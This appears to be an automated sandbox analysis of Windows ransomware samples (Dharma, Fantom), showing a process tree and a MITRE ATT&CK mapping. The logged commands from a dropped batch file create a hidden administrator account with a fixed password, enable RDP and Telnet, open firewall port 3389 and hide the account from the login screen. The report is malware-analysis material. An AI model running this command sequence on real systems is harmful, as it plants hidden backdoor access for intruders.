  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5576
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5864
- - C:\Users\Admin\Downloads\ac\nc123.exe
    "C:\Users\Admin\Downloads\ac\nc123.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      System Location Discovery: System Language Discovery
      PID:4500
- - C:\Users\Admin\Downloads\ac\mssql.exe
    "C:\Users\Admin\Downloads\ac\mssql.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Impair Defenses: Safe Mode Boot
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2332
- - C:\Users\Admin\Downloads\ac\mssql2.exe
    "C:\Users\Admin\Downloads\ac\mssql2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:5312
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5732
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1500
  - - C:\Windows\SysWOW64\net.exe
      net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      System Location Discovery: System Language Discovery
      PID:228
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1540
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators systembackup /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:1432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators systembackup /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:5416
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1044
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5984
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      System Location Discovery: System Language Discovery
      PID:3100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:4388
  - - C:\Windows\SysWOW64\net.exe
      net accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      System Location Discovery: System Language Discovery
      PID:4840
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2224
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5940
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6004
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      4⤵
      Hide Artifacts: Hidden Users
      System Location Discovery: System Language Discovery
      PID:5552
  - - C:\Windows\SysWOW64\attrib.exe
      attrib C:\users\systembackup +r +a +s +h
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:5388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 3389 "Remote Desktop"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4548
  - - C:\Windows\SysWOW64\sc.exe
      sc config tlntsvr start=auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:3872
  - - C:\Windows\SysWOW64\net.exe
      net start Telnet
      4⤵
      System Location Discovery: System Language Discovery
      PID:5136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start Telnet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2228
- - C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
    "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
  2⤵
  PID:5384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
  2⤵
  PID:680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6332 /prefetch:2
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:4172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3136

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4040

C:\Users\Admin\Downloads\Fantom.exe
"C:\Users\Admin\Downloads\Fantom.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5124

C:\Users\Admin\Downloads\Fantom.exe
"C:\Users\Admin\Downloads\Fantom.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5624

C:\Users\Admin\Downloads\Fantom.exe
"C:\Users\Admin\Downloads\Fantom.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5988

C:\Users\Admin\Downloads\Fantom.exe
"C:\Users\Admin\Downloads\Fantom.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Safe Mode Boot

T1562.009

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

System Information Discovery